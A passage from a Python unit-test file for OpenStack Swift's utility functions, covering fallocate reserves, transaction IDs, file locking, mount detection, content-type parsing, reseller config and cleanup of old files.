utils.FALLOCATE_RESERVE = 2048
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
# Want 1023 reserved, have 1024 * 1 free, but file size is 1, so
# fails
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(1))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1023 <= 1023')
# Want 1022 reserved, have 1024 * 1 free, and file size is 1, so
# succeeds
utils.FALLOCATE_RESERVE = 1022
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(1)), 0)
# Want 1023 reserved, have 1024 * 1 free, and file size is 0, so
# succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEqual(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, and even though
# file size is 0, since we're under the reserve, fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEqual(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
finally:
utils.FALLOCATE_RESERVE = orig_FALLOCATE_RESERVE
utils.os.fstatvfs = orig_fstatvfs
def test_fallocate_func(self):
class FallocateWrapper(object):
def __init__(self):
self.last_call = None
def __call__(self, *args):
self.last_call = list(args)
self.last_call[-1] = self.last_call[-1].value
return 0
orig__sys_fallocate = utils._sys_fallocate
try:
utils._sys_fallocate = FallocateWrapper()
# Ensure fallocate calls _sys_fallocate even with 0 bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 0)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate even with negative bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, -5678)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate properly with positive
# bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 1)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 1])
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 10 * 1024 * 1024 * 1024)
self.assertEqual(utils._sys_fallocate.last_call,
[1234, 1, 0, 10 * 1024 * 1024 * 1024])
finally:
utils._sys_fallocate = orig__sys_fallocate
def test_generate_trans_id(self):
fake_time = 1366428370.5163341
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('')
self.assertEqual(len(trans_id), 34)
self.assertEqual(trans_id[:2], 'tx')
self.assertEqual(trans_id[23], '-')
self.assertEqual(int(trans_id[24:], 16), int(fake_time))
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('-suffix')
self.assertEqual(len(trans_id), 41)
self.assertEqual(trans_id[:2], 'tx')
self.assertEqual(trans_id[34:], '-suffix')
self.assertEqual(trans_id[23], '-')
self.assertEqual(int(trans_id[24:34], 16), int(fake_time))
def test_get_trans_id_time(self):
ts = utils.get_trans_id_time('tx8c8bc884cdaf499bb29429aa9c46946e')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-0051720c06')
self.assertEqual(ts, 1366428678)
self.assertEqual(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time(
'tx1df4ff4f55ea45f7b2ec2-0051720c06-suffix')
self.assertEqual(ts, 1366428678)
self.assertEqual(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time('')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('garbage')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-almostright')
self.assertEqual(ts, None)
def test_tpool_reraise(self):
with patch.object(utils.tpool, 'execute', lambda f: f()):
self.assertTrue(
utils.tpool_reraise(MagicMock(return_value='test1')), 'test1')
self.assertRaises(
Exception,
utils.tpool_reraise, MagicMock(side_effect=Exception('test2')))
self.assertRaises(
BaseException,
utils.tpool_reraise,
MagicMock(side_effect=BaseException('test3')))
def test_lock_file(self):
flags = os.O_CREAT | os.O_RDWR
with NamedTemporaryFile(delete=False) as nt:
nt.write("test string")
nt.flush()
nt.close()
with utils.lock_file(nt.name, unlink=False) as f:
self.assertEqual(f.read(), "test string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, unlink=False, append=True) as f:
f.seek(0)
self.assertEqual(f.read(), "test string")
f.seek(0)
f.write("\nanother string")
f.flush()
f.seek(0)
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, timeout=3, unlink=False) as f:
try:
with utils.lock_file(
nt.name, timeout=1, unlink=False) as f:
self.assertTrue(
False, "Expected LockTimeout exception")
except LockTimeout:
pass
with utils.lock_file(nt.name, unlink=True) as f:
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(
IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
self.assertRaises(OSError, os.remove, nt.name)
def test_lock_file_unlinked_after_open(self):
os_open = os.open
first_pass = [True]
def deleting_open(filename, flags):
# unlink the file after it's opened. once.
fd = os_open(filename, flags)
if first_pass[0]:
os.unlink(filename)
first_pass[0] = False
return fd
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.open', deleting_open):
with utils.lock_file(nt.name, unlink=True) as f:
self.assertNotEqual(os.fstat(nt.fileno()).st_ino,
os.fstat(f.fileno()).st_ino)
first_pass = [True]
def recreating_open(filename, flags):
# unlink and recreate the file after it's opened
fd = os_open(filename, flags)
if first_pass[0]:
os.unlink(filename)
os.close(os_open(filename, os.O_CREAT | os.O_RDWR))
first_pass[0] = False
return fd
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.open', recreating_open):
with utils.lock_file(nt.name, unlink=True) as f:
self.assertNotEqual(os.fstat(nt.fileno()).st_ino,
os.fstat(f.fileno()).st_ino)
def test_lock_file_held_on_unlink(self):
os_unlink = os.unlink
def flocking_unlink(filename):
# make sure the lock is held when we unlink
fd = os.open(filename, os.O_RDWR)
self.assertRaises(
IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
os.close(fd)
os_unlink(filename)
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.unlink', flocking_unlink):
with utils.lock_file(nt.name, unlink=True):
pass
def test_lock_file_no_unlink_if_fail(self):
os_open = os.open
with NamedTemporaryFile(delete=True) as nt:
def lock_on_open(filename, flags):
# lock the file on another fd after it's opened.
fd = os_open(filename, flags)
fd2 = os_open(filename, flags)
fcntl.flock(fd2, fcntl.LOCK_EX | fcntl.LOCK_NB)
return fd
try:
timedout = False
with mock.patch('os.open', lock_on_open):
with utils.lock_file(nt.name, unlink=False, timeout=0.01):
pass
except LockTimeout:
timedout = True
self.assertTrue(timedout)
self.assertTrue(os.path.exists(nt.name))
def test_ismount_path_does_not_exist(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(os.path.join(tmpdir, 'bar')))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_not_mount(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_error(self):
def _mock_os_lstat(path):
raise OSError(13, "foo")
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
# Raises exception with _raw -- see next test.
utils.ismount(tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_raw_path_error(self):
def _mock_os_lstat(path):
raise OSError(13, "foo")
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount_raw, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_symlink(self):
tmpdir = mkdtemp()
try:
link = os.path.join(tmpdir, "tmp")
os.symlink("/tmp", link)
self.assertFalse(utils.ismount(link))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_root(self):
self.assertTrue(utils.ismount('/'))
def test_ismount_parent_path_error(self):
_os_lstat = os.lstat
def _mock_os_lstat(path):
if path.endswith(".."):
raise OSError(13, "foo")
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
# Raises exception with _raw -- see next test.
utils.ismount(tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_raw_parent_path_error(self):
_os_lstat = os.lstat
def _mock_os_lstat(path):
if path.endswith(".."):
raise OSError(13, "foo")
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount_raw, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_dev(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
parent = _os_lstat(path)
return MockStat(parent.st_mode, parent.st_dev + 1,
parent.st_ino)
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_ino(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
return _os_lstat(path)
else:
parent_path = os.path.join(path, "..")
child = _os_lstat(path)
parent = _os_lstat(parent_path)
return MockStat(child.st_mode, parent.st_ino,
child.st_dev)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_parse_content_type(self):
self.assertEqual(utils.parse_content_type('text/plain'),
('text/plain', []))
self.assertEqual(utils.parse_content_type('text/plain;charset=utf-8'),
('text/plain', [('charset', 'utf-8')]))
self.assertEqual(
utils.parse_content_type('text/plain;hello="world";charset=utf-8'),
('text/plain', [('hello', '"world"'), ('charset', 'utf-8')]))
self.assertEqual(
utils.parse_content_type('text/plain; hello="world"; a=b'),
('text/plain', [('hello', '"world"'), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x="\""; a=b'),
('text/plain', [('x', r'"\""'), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x; a=b'),
('text/plain', [('x', ''), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x="\""; a'),
('text/plain', [('x', r'"\""'), ('a', '')]))
def test_override_bytes_from_content_type(self):
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=15'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEqual(listing_dict['bytes'], 15)
self.assertEqual(listing_dict['content_type'],
'text/plain;hello="world"')
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=hey'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEqual(listing_dict['bytes'], 1234)
self.assertEqual(listing_dict['content_type'],
'text/plain;hello="world"')
def test_clean_content_type(self):
subtests = {
'': '', 'text/plain': 'text/plain',
'text/plain; someother=thing': 'text/plain; someother=thing',
'text/plain; swift_bytes=123': 'text/plain',
'text/plain; someother=thing; swift_bytes=123':
'text/plain; someother=thing',
# Since Swift always tacks on the swift_bytes, clean_content_type()
# only strips swift_bytes if it's last. The next item simply shows
# that if for some other odd reason it's not last,
# clean_content_type() will not remove it from the header.
'text/plain; swift_bytes=123; someother=thing':
'text/plain; swift_bytes=123; someother=thing'}
for before, after in subtests.items():
self.assertEqual(utils.clean_content_type(before), after)
def test_quote(self):
res = utils.quote('/v1/a/c3/subdirx/')
assert res == '/v1/a/c3/subdirx/'
res = utils.quote('/v1/a&b/c3/subdirx/')
assert res == '/v1/a%26b/c3/subdirx/'
res = utils.quote('/v1/a&b/c3/subdirx/', safe='&')
assert res == '%2Fv1%2Fa&b%2Fc3%2Fsubdirx%2F'
unicode_sample = u'\uc77c\uc601'
account = 'abc_' + unicode_sample
valid_utf8_str = utils.get_valid_utf8_str(account)
account = 'abc_' + unicode_sample.encode('utf-8')[::-1]
invalid_utf8_str = utils.get_valid_utf8_str(account)
self.assertEqual('abc_%EC%9D%BC%EC%98%81',
utils.quote(valid_utf8_str))
self.assertEqual('abc_%EF%BF%BD%EF%BF%BD%EC%BC%9D%EF%BF%BD',
utils.quote(invalid_utf8_str))
def test_get_hmac(self):
self.assertEqual(
utils.get_hmac('GET', '/path', 1, 'abc'),
'b17f6ff8da0e251737aa9e3ee69a881e3e092e2f')
def test_get_policy_index(self):
# Account has no information about a policy
req = Request.blank(
'/sda1/p/a',
environ={'REQUEST_METHOD': 'GET'})
res = Response()
self.assertIsNone(utils.get_policy_index(req.headers,
res.headers))
# The policy of a container can be specified by the response header
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'GET'})
res = Response(headers={'X-Backend-Storage-Policy-Index': '1'})
self.assertEqual('1', utils.get_policy_index(req.headers,
res.headers))
# The policy of an object to be created can be specified by the request
# header
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Backend-Storage-Policy-Index': '2'})
res = Response()
self.assertEqual('2', utils.get_policy_index(req.headers,
res.headers))
def test_get_log_line(self):
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD', 'REMOTE_ADDR': '1.2.3.4'})
res = Response()
trans_time = 1.2
additional_info = 'some information'
server_pid = 1234
exp_line = '1.2.3.4 - - [01/Jan/1970:02:46:41 +0000] "HEAD ' \
'/sda1/p/a/c/o" 200 - "-" "-" "-" 1.2000 "some information" 1234 -'
with mock.patch(
'time.gmtime',
mock.MagicMock(side_effect=[time.gmtime(10001.0)])):
with mock.patch(
'os.getpid', mock.MagicMock(return_value=server_pid)):
self.assertEqual(
exp_line,
utils.get_log_line(req, res, trans_time, additional_info))
def test_cache_from_env(self):
# should never get logging when swift.cache is found
env = {'swift.cache': 42}
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env, False))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env, True))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
# check allow_none controls logging when swift.cache is not found
err_msg = 'ERROR: swift.cache could not be found in env!'
env = {}
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertIsNone(utils.cache_from_env(env))
self.assertTrue(err_msg in logger.get_lines_for_level('error'))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertIsNone(utils.cache_from_env(env, False))
self.assertTrue(err_msg in logger.get_lines_for_level('error'))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertIsNone(utils.cache_from_env(env, True))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
def test_fsync_dir(self):
tempdir = None
fd = None
try:
tempdir = mkdtemp(dir='/tmp')
fd, temppath = tempfile.mkstemp(dir=tempdir)
_mock_fsync = mock.Mock()
_mock_close = mock.Mock()
with patch('swift.common.utils.fsync', _mock_fsync):
with patch('os.close', _mock_close):
utils.fsync_dir(tempdir)
self.assertTrue(_mock_fsync.called)
self.assertTrue(_mock_close.called)
self.assertTrue(isinstance(_mock_fsync.call_args[0][0], int))
self.assertEqual(_mock_fsync.call_args[0][0],
_mock_close.call_args[0][0])
# Not a directory - arg is file path
self.assertRaises(OSError, utils.fsync_dir, temppath)
logger = FakeLogger()
def _mock_fsync(fd):
raise OSError(errno.EBADF, os.strerror(errno.EBADF))
with patch('swift.common.utils.fsync', _mock_fsync):
with mock.patch('swift.common.utils.logging', logger):
utils.fsync_dir(tempdir)
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
finally:
if fd is not None:
os.close(fd)
os.unlink(temppath)
if tempdir:
os.rmdir(tempdir)
def test_renamer_with_fsync_dir(self):
tempdir = None
try:
tempdir = mkdtemp(dir='/tmp')
# Simulate part of object path already existing
part_dir = os.path.join(tempdir, 'objects/1234/')
os.makedirs(part_dir)
obj_dir = os.path.join(part_dir, 'aaa', 'a' * 32)
obj_path = os.path.join(obj_dir, '1425276031.12345.data')
# Object dir had to be created
_m_os_rename = mock.Mock()
_m_fsync_dir = mock.Mock()
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
utils.renamer("fake_path", obj_path)
_m_os_rename.assert_called_once_with('fake_path', obj_path)
# fsync_dir on parents of all newly create dirs
self.assertEqual(_m_fsync_dir.call_count, 3)
# Object dir existed
_m_os_rename.reset_mock()
_m_fsync_dir.reset_mock()
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
utils.renamer("fake_path", obj_path)
_m_os_rename.assert_called_once_with('fake_path', obj_path)
# fsync_dir only on the leaf dir
self.assertEqual(_m_fsync_dir.call_count, 1)
finally:
if tempdir:
shutil.rmtree(tempdir)
def test_renamer_when_fsync_is_false(self):
_m_os_rename = mock.Mock()
_m_fsync_dir = mock.Mock()
_m_makedirs_count = mock.Mock(return_value=2)
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
with patch('swift.common.utils.makedirs_count',
_m_makedirs_count):
utils.renamer("fake_path", "/a/b/c.data", fsync=False)
_m_makedirs_count.assert_called_once_with("/a/b")
_m_os_rename.assert_called_once_with('fake_path', "/a/b/c.data")
self.assertFalse(_m_fsync_dir.called)
def test_makedirs_count(self):
tempdir = None
fd = None
try:
tempdir = mkdtemp(dir='/tmp')
os.makedirs(os.path.join(tempdir, 'a/b'))
# 4 new dirs created
dirpath = os.path.join(tempdir, 'a/b/1/2/3/4')
ret = utils.makedirs_count(dirpath)
self.assertEqual(ret, 4)
# no new dirs created - dir already exists
ret = utils.makedirs_count(dirpath)
self.assertEqual(ret, 0)
# path exists and is a file
fd, temppath = tempfile.mkstemp(dir=dirpath)
os.close(fd)
self.assertRaises(OSError, utils.makedirs_count, temppath)
finally:
if tempdir:
shutil.rmtree(tempdir)
class ResellerConfReader(unittest.TestCase):
def setUp(self):
self.default_rules = {'operator_roles': ['admin', 'swiftoperator'],
'service_roles': [],
'require_group': ''}
def test_defaults(self):
conf = {}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_'])
self.assertEqual(options['AUTH_'], self.default_rules)
def test_same_as_default(self):
conf = {'reseller_prefix': 'AUTH',
'operator_roles': 'admin, swiftoperator'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_'])
self.assertEqual(options['AUTH_'], self.default_rules)
def test_single_blank_reseller(self):
conf = {'reseller_prefix': ''}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''], self.default_rules)
def test_single_blank_reseller_with_conf(self):
conf = {'reseller_prefix': '',
"''operator_roles": 'role1, role2'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''].get('operator_roles'),
['role1', 'role2'])
self.assertEqual(options[''].get('service_roles'),
self.default_rules.get('service_roles'))
self.assertEqual(options[''].get('require_group'),
self.default_rules.get('require_group'))
def test_multiple_same_resellers(self):
conf = {'reseller_prefix': " '' , '' "}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
conf = {'reseller_prefix': '_, _'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['_'])
conf = {'reseller_prefix': 'AUTH, PRE2, AUTH, PRE2'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', 'PRE2_'])
def test_several_resellers_with_conf(self):
conf = {'reseller_prefix': 'PRE1, PRE2',
'PRE1_operator_roles': 'role1, role2',
'PRE1_service_roles': 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['PRE1_', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options['PRE1_'].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options['PRE1_'].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['PRE1_'].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_several_resellers_first_blank(self):
conf = {'reseller_prefix': " '' , PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_several_resellers_with_blank_comma(self):
conf = {'reseller_prefix': "AUTH , '', PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', '', 'PRE2_'])
self.assertEqual(set(['admin', 'swiftoperator']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual([],
options['AUTH_'].get('service_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['AUTH_'].get('require_group'))
self.assertEqual('', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_stray_comma(self):
conf = {'reseller_prefix': "AUTH ,, PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', 'PRE2_'])
self.assertEqual(set(['admin', 'swiftoperator']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual([],
options['AUTH_'].get('service_roles'))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['AUTH_'].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_multiple_stray_commas_resellers(self):
conf = {'reseller_prefix': ' , , ,'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''], self.default_rules)
def test_unprefixed_options(self):
conf = {'reseller_prefix': "AUTH , '', PRE2",
"operator_roles": 'role1, role2',
"service_roles": 'role3, role4',
'require_group': 'auth_blank_group',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', '', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options['AUTH_'].get('service_roles')))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('auth_blank_group',
options['AUTH_'].get('require_group'))
self.assertEqual('auth_blank_group', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
class TestUnlinkOlder(unittest.TestCase):
def setUp(self):
self.tempdir = mkdtemp()
self.mtime = {}
def tearDown(self):
rmtree(self.tempdir, ignore_errors=True)
def touch(self, fpath, mtime=None):
self.mtime[fpath] = mtime or time.time()
open(fpath, 'w')
@contextlib.contextmanager
def high_resolution_getmtime(self):
orig_getmtime = os.path.getmtime
def mock_getmtime(fpath):
mtime = self.mtime.get(fpath)
if mtime is None:
mtime = orig_getmtime(fpath)
return mtime
with mock.patch('os.path.getmtime', mock_getmtime):
yield
def test_unlink_older_than_path_not_exists(self):
path = os.path.join(self.tempdir, 'does-not-exist')
# just make sure it doesn't blow up
utils.unlink_older_than(path, time.time())
def test_unlink_older_than_file(self):
path = os.path.join(self.tempdir, 'some-file')
self.touch(path)
with self.assertRaises(OSError) as ctx:
utils.unlink_older_than(path, time.time())
self.assertEqual(ctx.exception.errno, errno.ENOTDIR)
def test_unlink_older_than_now(self):
self.touch(os.path.join(self.tempdir, 'test'))
with self.high_resolution_getmtime():
utils.unlink_older_than(self.tempdir, time.time())
self.assertEqual([], os.listdir(self.tempdir))
def test_unlink_not_old_enough(self):
start = time.time()
self.touch(os.path.join(self.tempdir, 'test'))
with self.high_resolution_getmtime():
utils.unlink_older_than(self.tempdir, start)
self.assertEqual(['test'], os.listdir(self.tempdir))
def test_unlink_mixed(self):
self.touch(os.path.join(self.tempdir, 'first'))
cutoff = time.time()
self.touch(os.path.join(self.tempdir, 'second'))
with self.high_resolution_getmtime():
utils.unlink_older_than(self.tempdir, cutoff)
self.assertEqual(['second'], os.listdir(self.tempdir))
def test_unlink_paths(self):
paths = []
for item in ('first', 'second', 'third'):
path = os.path.join(self.tempdir, item)
self.touch(path)
paths.append(path)
# don't unlink everyone
with self.high_resolution_getmtime():
utils.unlink_paths_older_than(paths[:2], time.time())
self.assertEqual(['third'], os.listdir(self.tempdir))
def test_unlink_empty_paths(self):
# just make sure it doesn't blow up
utils.unlink_paths_older_than([], time.time())
def test_unlink_not_exists_paths(self):
path = os.path.join(self.tempdir, 'does-not-exist')
# just make sure it doesn't blow up
utils.unlink_paths_older_than([path], time.time())
class TestSwiftInfo(unittest.TestCase):
def tearDown(self):
utils._swift_info = {}
utils._swift_admin_info = {}
def test_register_swift_info(self):
utils.register_swift_info(foo='bar')
utils.register_swift_info(lorem='ipsum')
utils.register_swift_info('cap1', cap1_foo='cap1_bar')
utils.register_swift_info('cap1', cap1_lorem='cap1_ipsum')
self.assertTrue('swift' in utils._swift_info)
self.assertTrue('foo' in utils._swift_info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('lorem' in utils._swift_info['swift'])
self.assertEqual(utils._swift_info['swift']['lorem'], 'ipsum')
self.assertTrue('cap1' in utils._swift_info)
self.assertTrue('cap1_foo' in utils._swift_info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
self.assertTrue('cap1_lorem' in utils._swift_info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_lorem'], 'cap1_ipsum')
self.assertRaises(ValueError,
utils.register_swift_info, 'admin', foo='bar')
self.assertRaises(ValueError,
utils.register_swift_info, 'disallowed_sections',
disallowed_sections=None)
utils.register_swift_info('goodkey', foo='5.6')
self.assertRaises(ValueError,
utils.register_swift_info, 'bad.key', foo='5.6')
data = {'bad.key': '5.6'}
self.assertRaises(ValueError,
utils.register_swift_info, 'goodkey', **data)
def test_get_swift_info(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info()
self.assertTrue('admin' not in info)
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('cap1' in info)
self.assertTrue('cap1_foo' in info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
def test_get_swift_info_with_disallowed_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
